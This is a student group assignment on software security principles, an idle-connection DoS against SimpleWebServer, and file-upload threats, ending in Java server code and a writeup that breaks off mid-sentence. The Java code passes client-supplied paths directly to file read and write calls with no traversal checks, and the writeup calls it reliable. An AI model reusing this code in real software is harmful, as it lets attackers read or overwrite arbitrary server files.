Security

The document outlines a group assignment on software security principles, focusing on key concepts such as authentication, authorization, confidentiality, integrity, accountability, and non-repudiation. It emphasizes the interdependencies between these concepts and their importance in protecting systems from attacks, including potential vulnerabilities and real-world examples. Additionally, it discusses the implications of attacks like Denial of Service (DoS) and suggests strategies for mitigation.


BAHIR DAR INSTITUTE OF TECHNOLOGY

FACULTY OF COMPUTING

Fundamentals of Software Security Group Assignment

Group Members
1. Abrham Mulualem………… 1504836
2. Dawit Gebeyehu…………… 1509830
3. Eyerus Tekto………………. 1506000
4. Genet Tesfaye……………… 1506226
5. Leul Esubalew………………1509829
6. Mahder Samuel……………..1506873
7. Meron Yeneneh……………. 1507102
8. Yared Mehari………………1508177

Table of Contents
Introduction
PART 2: Security Design Principles
1. Authentication and Authorization
2. Confidentiality and Integrity
3. Accountability and Non-Repudiation
What happens if a client connects to SimpleWebServer, but never sends any data and never disconnects? What type of an attack would such a client be able to conduct?
Programming Problem 1
Programming Problem 3

Introduction
Security design principles are the foundation of creating software that is both reliable and
resilient to attacks. These principles guide developers in building systems that protect sensitive
data, ensure authorized access, and maintain functionality even under malicious attempts to
compromise the system. By following these principles, software can be made more robust
against evolving threats and vulnerabilities.
At the heart of software security lies the understanding of key concepts such as authentication,
authorization, data integrity, and system availability. These concepts often work together—
authentication, for instance, verifies the identity of users, which is a prerequisite for determining
what they are allowed to do (authorization). A lack of coordination between these principles can
lead to exploitable weaknesses in software systems.
In practice, implementing security involves identifying potential threats and addressing them
effectively. For example, allowing users to upload files introduces risks such as malicious file
uploads, which could compromise the server. Similarly, ensuring that servers handle client
connections properly prevents attacks like denial-of-service (DoS), where resources are
overwhelmed by malicious activity. Addressing these threats requires the application of security
mechanisms like input validation, access control, and resource management.
Furthermore, real-world attacks often exploit misconfigurations or poor coding practices. For
instance, running a web server with excessive privileges, such as root access, can expose the
entire system to takeovers if vulnerabilities are exploited. An attacker could modify files, deface
websites, or even gain full control of the server. Such scenarios highlight the importance of
following the principle of least privilege and employing logging and monitoring to detect and
mitigate unauthorized actions.
By understanding and applying security design principles, developers can proactively protect
systems from a wide range of attacks. These principles not only ensure the safety of software but
also instill trust in users, demonstrating a commitment to safeguarding their data and interactions
with the system.

PART 2: Security Design Principles
Are there dependencies between any of the security concepts that we covered?
For example, is authentication required for authorization? Why or why not?

Yes, there are dependencies between these security concepts. Some of them are:

1. Authentication and Authorization

As we discussed, authentication is the process of verifying the identity of a user, system, or entity. It is the security mechanism that answers the question: "Who are you?" Common methods of authentication include something you know, something you have, and something you are.

The purpose of authentication is to ensure that the system can uniquely identify the user or entity
requesting access. Once authentication is successful, the system has confidence in the identity of
the requester.

Authorization, on the other hand, answers the question: "What are you allowed to do?" It is the process
of granting or denying permissions to resources or actions based on the authenticated identity.
Authorization mechanisms often rely on predefined policies, roles, or access control lists (ACLs).

Dependencies between Authentication and Authorization

While authentication and authorization are distinct processes, they are highly dependent on each other. Authorization is meaningless without authentication: the system must verify the identity of the user before it can determine what that user is allowed to do. Without a confirmed identity, the system cannot enforce any meaningful access controls. Imagine a scenario where a system skips authentication and grants access based on assumed identities; malicious actors could trivially bypass security and gain unauthorized access.

To illustrate this dependency, we can consider the following analogy:

Authentication is like showing your ID at the entrance of a restricted area. It proves you
are who you claim to be. Authorization is the list of rooms you’re allowed to enter. Once
your identity is verified, security personnel check whether you’re permitted to access certain
areas.

Without verifying your identity (authentication), the security guard cannot determine your access
rights (authorization). Similarly, in software systems, the lack of authentication would render
authorization mechanisms ineffective.

Why Authentication is Crucial for Authorization

Authentication acts as the foundation upon which authorization builds. Without a verified
identity, any attempt at authorization becomes arbitrary and insecure. If authentication fails, the
system cannot proceed to authorization because it has no idea who is attempting to access the
resources.

For example, if an attacker can bypass authentication, they may gain unauthorized access to resources, rendering authorization policies ineffective.

Potential Issues if Authentication is Missing

Without authentication, authorization can become a significant vulnerability. Imagine a web application that grants administrative access to anyone who simply navigates to an admin URL. In such a case, there is no assurance of the user's identity, allowing attackers to exploit this loophole and compromise the system. Without authentication, authorization becomes meaningless and the system is wide open to abuse.

Suppose a public Wi-Fi network doesn’t require authentication (like entering a password).
Anyone in the area could connect, including malicious users. Once connected, they might exploit
the network to access sensitive data or launch attacks on other connected devices.

Banking Without Login: Imagine a banking app that lets anyone access account features without logging in. Without verifying who the user is, anyone could view your bank balance, transfer money, or access sensitive personal details. This would be catastrophic for both the users and the bank.

Real-World Examples

In real-world systems, authentication and authorization work together to enforce security policies. Consider the following scenarios:

Online Banking:

Authentication: Users log in using a combination of username, password, and a one-time password (OTP) sent to their registered device.

Authorization: Once authenticated, users can view account balances, but only those with
specific permissions can initiate fund transfers or update account details.

Hotel Example: When you check into a hotel, the receptionist verifies your identity
(authentication) using an ID or reservation details. Once verified, you’re given a room keycard.
This keycard controls where you’re authorized to go—your room, the gym, or the breakfast
lounge. Without confirming who you are, the hotel cannot decide which keycard to issue or what
access permissions you should have.

School System Example: A teacher logs into a school’s grading portal. Authentication verifies
that the user is indeed a teacher. Authorization then allows the teacher to view and edit only the
grades for their own classes, not for students in other classes.
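The dependency described in this section can be sketched in code. The following is a minimal illustration, assuming a hypothetical credential store and role table (the user names, passwords, and roles are invented for this example, not taken from the assignment):

```java
import java.util.Map;

public class AuthDemo {
    // Hypothetical credential store (illustrative only; real systems store
    // salted password hashes, never plaintext).
    private static final Map<String, String> PASSWORDS =
            Map.of("alice", "secret1", "bob", "secret2");
    // Hypothetical role assignments consulted by the authorization step.
    private static final Map<String, String> ROLES =
            Map.of("alice", "admin", "bob", "viewer");

    // Step 1: authentication answers "Who are you?"
    public static String authenticate(String user, String password) {
        if (password != null && password.equals(PASSWORDS.get(user))) {
            return user;   // verified identity
        }
        return null;       // authentication failed
    }

    // Step 2: authorization answers "What are you allowed to do?" It needs
    // the verified identity from step 1, never a merely claimed one.
    public static boolean isAuthorized(String verifiedUser, String requiredRole) {
        if (verifiedUser == null) {
            return false;  // no identity, no access decision
        }
        return requiredRole.equals(ROLES.get(verifiedUser));
    }

    public static void main(String[] args) {
        String id = authenticate("alice", "secret1");
        System.out.println(isAuthorized(id, "admin"));                            // true
        System.out.println(isAuthorized(authenticate("bob", "wrong"), "viewer")); // false
    }
}
```

The key design point is that `isAuthorized` refuses to make any decision when the identity is `null`, which is exactly the dependency argued above: authorization cannot proceed until authentication has succeeded.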

2. Confidentiality and Integrity

Confidentiality ensures that information is only accessible to those who are authorized to see it. It prevents unauthorized access to sensitive data and answers the question: "Who can access this information?" The key features of confidentiality include data protection, encryption, and access control.

For example, when you log into your online banking account, your financial data is protected through encryption. Confidentiality ensures no one else can intercept and view your transactions.

Integrity ensures that information is accurate, consistent, and not altered by unauthorized parties.
It answers the question: “Is this information correct and unaltered?”. Key features of
Integrity include data validation, hashing, checksums and digital signatures.

For example, imagine sending a contract via email. If the email's content is altered during transit, the recipient could receive false or manipulated information. To preserve integrity, digital signatures can verify that the email content has not changed.

How Confidentiality and Integrity Depend on Each Other

Confidentiality Without Integrity - If a system only ensures confidentiality but not integrity,
attackers could manipulate data without anyone knowing, even if the data remains hidden from
unauthorized users.

For example, an attacker intercepts and alters an encrypted file. Although the file is encrypted (confidentiality), the attacker could corrupt its content because the system does not validate its integrity.

Integrity Without Confidentiality - If a system ensures integrity but not confidentiality, attackers
might not be able to modify the data, but they can still see it.

For example, a bank statement might be digitally signed to ensure integrity, but if it is sent in plain text without encryption, unauthorized users can read its sensitive details.

Dependency Between the Two

Integrity Requires Confidentiality - To prevent tampering with sensitive information, you first
need to ensure it cannot be accessed by unauthorized parties (confidentiality).

Confidentiality Requires Integrity - If the data being protected is corrupted or manipulated, the
confidentiality of false or inaccurate data becomes meaningless.

Which Comes First?

Neither concept is inherently more important than the other. They often complement each other.
However, in certain cases:

Confidentiality First: Systems handling highly sensitive data (e.g., government secrets or
financial records) prioritize confidentiality to prevent data exposure.

Integrity First: Systems like public health databases may prioritize integrity to ensure that
accurate information is available to everyone, even if confidentiality is less critical.

Real-World Examples of Dependency

Secure Messaging Apps - Apps like WhatsApp use encryption (confidentiality) to ensure that
messages can only be read by the sender and receiver. They also include message authentication
codes (integrity) to ensure that the messages are not altered during transit.

File Downloads - When downloading software from a website, the site may provide a checksum
or digital signature. This ensures that the file you downloaded (confidentiality) is the same as the
one on the server and has not been corrupted (integrity).
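The file-download scenario can be sketched in code. The example below covers only the integrity half of the pair (a published SHA-256 checksum that the client recomputes after downloading); confidentiality would require encrypting the transfer on top of this. The file contents are illustrative placeholders:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class ChecksumVerify {
    // Compute the SHA-256 digest of some data as a lowercase hex string.
    public static String sha256Hex(byte[] data) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest(data)) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    // Integrity check: does the downloaded copy match the published checksum?
    public static boolean matches(byte[] downloaded, String publishedHex) throws Exception {
        return sha256Hex(downloaded).equals(publishedHex);
    }

    public static void main(String[] args) throws Exception {
        byte[] original = "installer-v1.0".getBytes(StandardCharsets.UTF_8);
        String published = sha256Hex(original);           // checksum shown on the site
        byte[] tampered = "installer-v1.0-evil".getBytes(StandardCharsets.UTF_8);
        System.out.println(matches(original, published)); // true: intact
        System.out.println(matches(tampered, published)); // false: altered in transit
    }
}
```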

Potential Issues When One is Missing

Missing Confidentiality
In online banking, if an attacker can view your account details (lack of confidentiality), they can
misuse this information, even if the data remains accurate.

Missing Integrity
Consider medical test results being transmitted to a doctor. If an attacker alters the results (lack
of integrity), the patient could receive a misdiagnosis, even if the communication is encrypted.

3. Accountability and Non-Repudiation

Accountability ensures that every action within a system can be attributed to a specific individual or entity. It allows organizations to monitor user activities, detect unauthorized behavior, and hold individuals responsible for their actions. Some of the key features of accountability are logging and monitoring, audit trails, and role definition.

For example, ATMs keep a record of every transaction linked to a specific user via their card and PIN. If a dispute arises about a withdrawal, the bank can review the transaction logs.

Non-repudiation ensures that a user cannot deny performing an action or sending data. It
provides proof that the action occurred, often through mechanisms like digital signatures or
secure logging.

For example, when you purchase something online, the system generates a receipt with your order details and timestamp. This ensures that you cannot deny making the purchase.

Dependency Between Accountability and Non-Repudiation

Accountability often depends on non-repudiation to ensure that recorded actions can be tied to
individuals without the possibility of denial. Non-repudiation provides the proof required to
make accountability enforceable.

Why Non-Repudiation is Required for Accountability?

Accountability requires trust in the accuracy of logs or records. Without non-repudiation mechanisms, users could deny performing logged actions, undermining the reliability of the accountability process.

For example, if a user’s actions are recorded in a log but they can claim the log was forged or
tampered with, the accountability system fails. Digital signatures or cryptographic proofs ensure
the integrity and authenticity of those logs.
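One way to make logs tamper-evident, sketched below, is to append a message authentication code (HMAC-SHA256) to each entry using a server-held secret key. The entry format and key are illustrative assumptions. Note that an HMAC makes tampering detectable but, because anyone holding the key could forge a tag, full non-repudiation toward a third party would require asymmetric digital signatures instead:

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;

public class TamperEvidentLog {
    // Compute an HMAC tag over a log record with a server-held secret key.
    public static String hmacHex(byte[] key, String record) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        StringBuilder sb = new StringBuilder();
        for (byte b : mac.doFinal(record.getBytes(StandardCharsets.UTF_8))) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    // Store "record | tag"; any later edit to the record invalidates the tag.
    public static String signedEntry(byte[] key, String record) throws Exception {
        return record + " | " + hmacHex(key, record);
    }

    // Verify an entry: recompute the tag over the record part and compare.
    public static boolean verifyEntry(byte[] key, String entry) throws Exception {
        int sep = entry.lastIndexOf(" | ");
        if (sep < 0) return false;
        return hmacHex(key, entry.substring(0, sep)).equals(entry.substring(sep + 3));
    }
}
```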

Can Accountability Exist Without Non-Repudiation?

Accountability can exist without strong non-repudiation mechanisms in some cases, but it
becomes weaker. For instance: A basic logging system might track user actions, but without
tamper-proof records (provided by non-repudiation), the user can argue the logs are inaccurate.

Which Comes First?

Non-Repudiation First: Non-repudiation lays the foundation for accountability by ensuring that all actions are provable and cannot be denied. Without non-repudiation, accountability mechanisms might lack credibility.

Accountability First: In practical implementations, accountability mechanisms like logging are set up before non-repudiation measures are added. However, accountability is incomplete without the assurance provided by non-repudiation.

Real-World Examples of Dependency

Banking Transactions:

Accountability: A banking system logs every transaction made by a user, including deposits and withdrawals.
Non-Repudiation: Digital receipts and timestamps are issued for each transaction, ensuring the user cannot deny making them.

Email Communication:

Accountability: Email servers maintain logs of who sent emails and when.
Non-Repudiation: Digital signatures ensure that the sender cannot deny sending the email and
that the content was not altered in transit.

Potential Issues When One is Missing

If a system lacks accountability, it becomes impossible to determine who performed certain actions. For example, in a shared computer system without user-specific logging, if someone deletes critical files, no one can be held responsible.

Without non-repudiation, individuals can deny their actions, making accountability unenforceable. For example, in an online payment system, if there is no receipt or signature proving the transaction, the payer could deny making the purchase.

What happens if a client connects to SimpleWebServer, but never sends any data
and never disconnects? What type of an attack would such a client be able to
conduct?

If a client connects to SimpleWebServer but never sends any data and never disconnects, the client can conduct a denial-of-service (DoS) attack, often called an idle-connection attack. In this kind of attack, the attacker exhausts the server's resources by keeping connections open without any activity, making the server unavailable to legitimate users. This attack works in several ways:

 Resource Exhaustion: A server allocates resources, such as memory and file descriptors,
to each connection. If too many clients connect and stay idle, all of the resources will be
used up and no legitimate users will be able to connect to the server.
 Connection Flooding: An attacker may create multiple connections without sending any
data. In such a case, the server may get flooded by handling new connections. This could
result in either slow responses or complete unavailability of a service to legitimate users.
 TCP Connection Limits: Most servers have a limit on the number of concurrent
connections they can handle. By keeping connections open without sending data, an
attacker can reach this limit, effectively blocking new connections.
 Idle Timeout Manipulation: If the server has some kind of timeout for idle connections,
then an attacker can exploit this to keep connections alive longer than intended; this can
cause resource leaks or delays in handling legitimate requests.

Why it is not easily detectable

 Web servers usually try to be polite and stay connected until data is received from a
client.
 The attack works by making multiple connections and holding each of them without
sending any substantial amount of data.
 Unlike other types of attacks, a Slowloris-style attack uses very little bandwidth, which makes it hard to detect.

Some effective strategies for mitigating Denial of Service (DoS) on a web server:

i. Rate Limiting: Limit the number of requests a client can make over a certain amount of time. This prevents a single client from overwhelming the server with a large number of connections.
ii. Connection Timeouts: Use proper connection timeouts for idle connections. If a
connection remains idle for longer than a threshold amount of time, it is dropped to free
up the resources for users.
iii. Load Balancing: Use load balancers to distribute incoming traffic across multiple servers.
This can help absorb the impact of an attack and maintain service availability.
iv. IP Blacklisting/Whitelisting: Monitor traffic patterns and block IP addresses that exhibit
suspicious behavior. Conversely, whitelisting known good IPs can help reduce the risk of
attacks.
v. Web Application Firewalls: Implement a WAF to filter and monitor the HTTP traffic to
and from the web application. A WAF can easily help in detecting and blocking such
malicious requests right before they actually reach the server.
vi. Traffic Analysis and Anomaly Detection: Establish mechanisms to analyze patterns of
traffic and detect anomalies. This may enable early detection of attacks and rapid
responses.
vii. Scaling Resources: Utilize cloud services that offer dynamic scaling of resources to handle any sudden spike in traffic, both valid and invalid.
viii. CAPTCHA: Introduce a CAPTCHA challenge for specific actions initiated by a user or
when high traffic is encountered, in order to ensure the request originator is a human
user, not an automated script.
ix. Session Management: Make use of session management techniques whereby the number
of concurrent sessions per user can be restricted as an efficient countermeasure to
resource exhaustion.
x. Redundancy and Failover Systems: Utilize redundant systems with failover mechanisms
so that in case one server fails or gets overloaded, the service remains uninterrupted
because other servers switch in seamlessly.
xi. Regular Security Audits: Perform periodic security audits and vulnerability assessments
to find and fix potential loopholes within the server configuration and application code.

xii. Training of Staff: Train staff in security practices and in monitoring for unusual activity, so that potential threats are spotted early and handled appropriately.
xiii. Incident Response Plan: Establish an incident response plan that details the steps to take if a DoS attack occurs, enabling a timely and orderly response that minimizes damage.
xiv. Content Delivery Networks (CDNs): Utilize CDNs to cache content and serve it from
multiple locations. This can help offload traffic from the origin server and absorb some of
the attack traffic.

By combining these strategies, web servers can significantly reduce their vulnerability to DoS
attacks and maintain better service availability for legitimate users.
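As a concrete illustration of mitigation (ii), SimpleWebServer could set a read timeout on each accepted socket so that a silent client is dropped instead of holding resources forever. The sketch below is an assumption about how this could look, not the assignment's actual server code; the 200 ms timeout is only for demonstration (a real server would use something on the order of seconds):

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketTimeoutException;

public class IdleTimeoutDemo {
    // Returns true when an idle client was disconnected by the timeout.
    public static boolean handleWithTimeout(Socket client, int millis) throws Exception {
        client.setSoTimeout(millis); // reads now fail after `millis` of silence
        try (BufferedReader br =
                 new BufferedReader(new InputStreamReader(client.getInputStream()))) {
            br.readLine();           // blocks at most `millis`
            return false;            // client actually sent data
        } catch (SocketTimeoutException e) {
            client.close();          // reclaim the resources the idle client held
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        try (ServerSocket server = new ServerSocket(0)) {
            // Simulated attacker: connects but never writes anything.
            Socket attacker = new Socket("localhost", server.getLocalPort());
            Socket serverSide = server.accept();
            System.out.println(handleWithTimeout(serverSide, 200)); // true: idle client dropped
            attacker.close();
        }
    }
}
```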

Programming Problem 1

 HTTP supports a mechanism that allows users to upload files, in addition to retrieving them, through a PUT command.
 What threats would you need to consider if Simple Web Server also had functionality that could be used to upload files?
 For each of the specific threats you just listed, what types of security mechanisms might you put in place to mitigate the threats?

If a Simple Web Server were to implement file upload functionality, it would need to address several critical security threats. Integrating file upload capabilities into a web application opens the server to a variety of security risks:

1. Malicious File Upload: Attackers could upload files that contain malicious content, such as
malware, shell scripts, or even code that might be executed on the server (e.g., PHP, Python, or
executable files). Such files could result in server compromise or enable attackers to escalate
their privileges.

Risk: This can lead to arbitrary code execution, remote code execution (RCE), or even server
hijacking.

To mitigate this threat

 File Type and Signature Validation: You should not rely solely on file extensions. Files
should be validated by checking both MIME types and the magic bytes (file signatures)
to ensure the file content matches its declared type.

 Antivirus Scanning: Use security tools or third-party services to scan files for viruses and malware (e.g., ClamAV or commercial tools).
 Whitelist Allowed File Types: Instead of trying to block potentially dangerous file
types, explicitly define which types are allowed (e.g., only images, PDF documents). This
can significantly reduce risk.
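A combined signature-and-whitelist check could look like the sketch below. The two file types and their magic bytes are illustrative assumptions; a real server would cover every type it accepts:

```java
import java.util.Arrays;

public class SignatureCheck {
    // Well-known signatures: PNG files start with 0x89 'P' 'N' 'G',
    // PDF files start with "%PDF".
    private static final byte[] PNG_MAGIC = {(byte) 0x89, 'P', 'N', 'G'};
    private static final byte[] PDF_MAGIC = {'%', 'P', 'D', 'F'};

    // True when the data begins with the given signature bytes.
    private static boolean hasPrefix(byte[] data, byte[] prefix) {
        return data.length >= prefix.length
                && Arrays.equals(Arrays.copyOfRange(data, 0, prefix.length), prefix);
    }

    // Whitelist check: the declared extension must match the real signature,
    // so a PHP script renamed to "fake.png" is still rejected.
    public static boolean isAllowed(String filename, byte[] firstBytes) {
        String lower = filename.toLowerCase();
        if (lower.endsWith(".png")) return hasPrefix(firstBytes, PNG_MAGIC);
        if (lower.endsWith(".pdf")) return hasPrefix(firstBytes, PDF_MAGIC);
        return false; // anything not explicitly whitelisted is rejected
    }
}
```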

2. Path Traversal Attacks: Attackers might exploit file upload functionality by attempting path
traversal attacks, where they include sequences like ../../../ in the file path. This could allow them
to access or overwrite sensitive files outside of the designated upload directory.

Risk: It could lead to data breaches, unauthorized access to sensitive files, or server
misconfigurations.

To mitigate this threat:

 Sanitize Input: Ensure that uploaded file names are sanitized to remove any path traversal
characters (.., /, \). This can be done by normalizing file paths before saving.
 Restrict File Paths: Do not allow the specification of file paths. Always use a server-
generated name for each file (e.g., a UUID or hash of the file content), and store files in a
designated, isolated directory.
 Use Absolute Paths: Always resolve file paths to absolute paths and verify that the
resolved path remains within the intended directory.
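The path-resolution check from the last two bullets can be sketched as follows; the directory name "uploads" is an assumption for illustration:

```java
import java.io.File;

public class PathGuard {
    // True only when the requested name resolves inside the upload directory.
    // getCanonicalPath() collapses "..", ".", and symlink-free redundancy,
    // so traversal sequences cannot escape the base directory unnoticed.
    public static boolean staysInside(File uploadDir, String requestedName) throws Exception {
        String base = uploadDir.getCanonicalPath() + File.separator;
        String resolved = new File(uploadDir, requestedName).getCanonicalPath();
        return resolved.startsWith(base);
    }

    public static void main(String[] args) throws Exception {
        File dir = new File("uploads");
        System.out.println(staysInside(dir, "report.txt"));       // safe name inside the directory
        System.out.println(staysInside(dir, "../../etc/passwd")); // traversal attempt, rejected
    }
}
```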

3. Overwriting Existing Files: If an attacker uploads a file with the same name as an important
system file or configuration file, this could cause the file to be overwritten, potentially leading to
system compromise.

Risk: Data loss, system corruption, or unauthorized access could occur if critical files are
overwritten.

To mitigate this threat:

 Unique File Naming: Generate a unique identifier for each uploaded file (e.g., a UUID,
timestamp, or cryptographic hash of the file content) to prevent name collisions.
 Check Before Overwriting: Always check if the file already exists and if so, reject the
upload or assign a new name.
 File Integrity Checks: For particularly sensitive or important files, consider
implementing integrity checks (e.g., using hashes) to verify that they haven't been
tampered with.
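Server-side name generation can be sketched as below; the extension whitelist is an illustrative assumption:

```java
import java.util.UUID;

public class UploadNaming {
    // Ignore the client-supplied name entirely except for a whitelisted
    // extension; the stored name is server-generated, so it can never be
    // chosen by an attacker to collide with or overwrite a critical file.
    public static String serverSideName(String clientFilename) {
        String ext = "";
        int dot = clientFilename.lastIndexOf('.');
        if (dot >= 0) {
            String candidate = clientFilename.substring(dot).toLowerCase();
            // Keep the extension only when it is on the whitelist.
            if (candidate.matches("\\.(png|jpg|pdf|txt)")) {
                ext = candidate;
            }
        }
        return UUID.randomUUID() + ext;
    }
}
```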

4. Denial of Service (DoS) Attacks: An attacker could attempt to upload very large files or
perform frequent uploads to exhaust server resources such as disk space, memory, or bandwidth.

Risk: This could lead to service unavailability, degraded server performance, or potentially a
system crash.

To mitigate this threat:

 Limit File Size: Impose a strict file size limit (e.g., 10MB or 100MB) to prevent large
files from consuming excessive disk space or memory.
 Limit the Number of Requests: Implement rate-limiting on upload requests to mitigate
the risk of flooding the server with too many requests in a short time.
 Timeouts: Set reasonable timeouts for file uploads and reject uploads that take too long
to complete.
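A hard size cap should be enforced while reading, not after, so an attacker cannot fill the disk before the check runs. The sketch below assumes an in-memory buffer and an 8 KB read chunk, both illustrative choices:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;

public class UploadLimiter {
    // Read at most maxBytes from the client; abort as soon as the cap is hit.
    public static byte[] readWithLimit(InputStream in, long maxBytes) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        long total = 0;
        int n;
        while ((n = in.read(buf)) != -1) {
            total += n;
            if (total > maxBytes) {
                // Reject mid-stream instead of buffering the whole upload first.
                throw new IOException("413 Payload Too Large: limit " + maxBytes + " bytes");
            }
            out.write(buf, 0, n);
        }
        return out.toByteArray();
    }
}
```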

5. Remote Code Execution (RCE) via File Upload: Attackers could upload executable code or
scripts (e.g., PHP, JSP, ASP files), which, when accessed, could be executed on the server,
resulting in remote code execution.

Risk: This is one of the most severe risks as it can give attackers full control over the server and
potentially the entire network.

To mitigate this threat:

 Restrict File Extensions and Content: Explicitly block the upload of executable files
such as .exe, .php, .jsp, .asp. Even if these file types are renamed or disguised, they
should still be detected through signature analysis.
 Server Configuration: If it's necessary to allow certain types of files (like .php for
legitimate reasons), configure the server so that files in the upload directory cannot be
executed (e.g., by placing them outside the web root or by modifying the web server's
configuration to block script execution in that directory).
 File Permissions: Store uploaded files with strict permissions to prevent them from being
executed.

6. Cross-Site Scripting (XSS) via Uploaded Files: Attackers could upload HTML or JavaScript files that, when served to users, could execute malicious scripts in their browsers. This could lead to session hijacking, cookie theft, or user impersonation.

Risk: XSS attacks could compromise the security of users visiting the site, steal sensitive data, or
perform unauthorized actions.

To mitigate this threat:

 Sanitize Content: If HTML files or documents are allowed, sanitize the contents of these
files to remove any malicious JavaScript or HTML that could trigger XSS attacks.
Libraries like DOMPurify can help sanitize user-uploaded HTML.
 Content Security Policy (CSP): Implement a CSP that restricts the execution of
JavaScript and other potentially dangerous content unless explicitly trusted.
 Escape Output: For any user-uploaded content that might be displayed on the web page,
ensure proper escaping of any special characters in the output to prevent script execution.

7. Insecure File Storage and Access Control: If uploaded files are not properly stored or protected, attackers might gain unauthorized access to them, potentially exposing sensitive data (e.g., passwords, personal information).

Risk: This could lead to a data breach or unauthorized access to sensitive information.

To mitigate this threat:

 File Permissions: Store files with minimal permissions, ensuring only authorized users
or systems can access them.
 Encryption: For sensitive files, encrypt them both at rest (on disk) and in transit (while
being uploaded or downloaded).
 Isolated Upload Directories: Store files in directories that are not directly accessible
through the web server (i.e., outside of the public document root).

8. Insufficient Logging and Monitoring: Lack of proper logging and monitoring could allow
malicious file uploads to go unnoticed, making it difficult to detect or prevent attacks.

Risk: This could lead to prolonged exploitation, as attackers would not be detected in time to
mitigate damage.

To mitigate this threat:

 Comprehensive Logging: Log every upload attempt, including details like the file name,
file size, MIME type, user ID, and upload timestamp. Logs should be reviewed regularly
for suspicious activity.
 Real-Time Alerts: Set up monitoring tools to trigger alerts when abnormal file uploads
are detected (e.g., large files, frequent uploads, or dangerous file types).

Programming Problem 2:

public void storeFile(BufferedReader br, OutputStreamWriter osw, String pathname) throws Exception {
    FileWriter fw = null;
    try {
        fw = new FileWriter(pathname);
        String s = br.readLine();
        while (s != null) {
            fw.write(s);
            s = br.readLine();
        }
        fw.close();
        osw.write("HTTP/1.0 201 Created");
    } catch (Exception e) {
        osw.write("HTTP/1.0 500 Internal Server Error");
    }
}

public void logEntry(String filename, String record) throws Exception {
    FileWriter fw = new FileWriter(filename, true);
    fw.write(getTimestamp() + " " + record);
    fw.close();
}

public String getTimestamp() {
    return (new Date()).toString();
}

 Modify the processRequest() method in SWS to use this file storage and
logging code
Modified processRequest()
public void processRequest(Socket s) throws Exception {
    // Used to read data from the client.
    BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
    // Used to write data to the client.
    OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream());
    // Read the HTTP request from the client.
    String request = br.readLine();
    String command = null;
    String pathname = null;
    StringTokenizer st = new StringTokenizer(request, " ");
    command = st.nextToken();
    pathname = st.nextToken();
    try {
        if (command.equals("GET")) {
            // Handle GET request: Serve the requested file.
            serveFile(osw, pathname);
        } else if (command.equals("POST")) {
            // Handle POST request: Store the file using the provided storeFile method.
            storeFile(br, osw, pathname);
            // Log the successful file storage using the provided logEntry method.
            logEntry("server.log", "File successfully created at: " + pathname);
        } else {
            // Handle unsupported commands.
            osw.write("HTTP/1.0 501 Not Implemented\r\n");
            osw.write("Content-Type: text/plain\r\n");
            osw.write("\r\n");
            osw.write("Error: Command not implemented.\n");
            osw.flush();
            // Log the unsupported command.
            logEntry("server.log", "Unsupported command received: " + command);
        }
    } catch (Exception e) {
        // Handle any exceptions during request processing.
        osw.write("HTTP/1.0 500 Internal Server Error\r\n");
        osw.write("Content-Type: text/plain\r\n");
        osw.write("\r\n");
        osw.write("Error processing request: " + e.getMessage() + "\n");
        osw.flush();
        // Log the error using the provided logEntry method.
        logEntry("server.log", "Error processing request: " + e.getMessage());
    } finally {
        // Close the connection to the client.
        osw.close();
    }
}
// serveFile method: handles GET requests by returning the requested file
private void serveFile(OutputStreamWriter osw, String pathname) throws Exception {
    try {
        File file = new File(pathname);
        if (!file.exists()) {
            osw.write("HTTP/1.0 404 Not Found\r\n");
            osw.write("Content-Type: text/plain\r\n");
            osw.write("\r\n");
            osw.write("Error: File not found.\n");
        } else {
            osw.write("HTTP/1.0 200 OK\r\n");
            osw.write("Content-Type: text/plain\r\n");
            osw.write("\r\n");
            // Read the file and write its content to the client.
            BufferedReader fileReader = new BufferedReader(new FileReader(file));
            String line;
            while ((line = fileReader.readLine()) != null) {
                osw.write(line + "\n");
            }
            fileReader.close();
        }
        osw.flush();
    } catch (IOException e) {
        osw.write("HTTP/1.0 500 Internal Server Error\r\n");
        osw.write("Content-Type: text/plain\r\n");
        osw.write("\r\n");
        osw.write("Error serving file: " + e.getMessage() + "\n");
        osw.flush();
        // Log the error.
        logEntry("server.log", "Error serving file: " + e.getMessage());
    }
}
Before the Changes
The original processRequest() method contained repetitive and scattered logic for handling file
storage and logging. In the case of POST requests, the file storage was manually implemented
with a FileOutputStream where each line had to be read and written to a file individually.
Although it worked, this approach duplicated code that could have been centralized for
reusability. Logging was implemented in some places, but it was done inconsistently with
hardcoded messages and no uniform formatting or timestamps, making it difficult to trace
events. Logging for unsupported commands or errors was either missing or not integrated into a
standardized framework. Moreover, the placeholder for the serveFile() method meant that GET
requests were not properly supported, leaving the server incomplete.
After the Modifications
The revised processRequest() method now utilizes the existing storeFile() method for file storage
during POST requests, thus avoiding code duplication. This approach guarantees that the
behavior of file storage is always the same and that proper HTTP responses are sent to the client.
Logging was also improved by fully integrating the logEntry() method, which provides uniform
formatting and timestamps for all logged events, including successful file storage, unsupported
commands, and error handling. This improves the modularity of the code and maintainability.
Now, the server can serve files completely because the serveFile() method has been added to
handle GET requests. All these changes make the code of the server much more readable,
maintainable, and reliable.
A deeper look into the changes is as follows:
1. Replace Manual File Storage with storeFile()
Original:
File storage during POST requests was done manually using a FileOutputStream. The server read
each line of input and wrote that to the file, ensuring that line breaks were preserved. It worked
but forced repetitive code, not allowing for centralized error handling and consistent HTTP
responses.
Modified:
The manual file-writing logic is now replaced with a call to storeFile(), which encapsulates all
the operations required to store a file. The change centralizes the logic of handling files in one
place, making it reusable and thus easier to maintain. The storeFile() method also takes care of
HTTP response codes—201 Created on success or 500 Internal Server Error on failure—without
duplicating logic in processRequest().
This is better because:
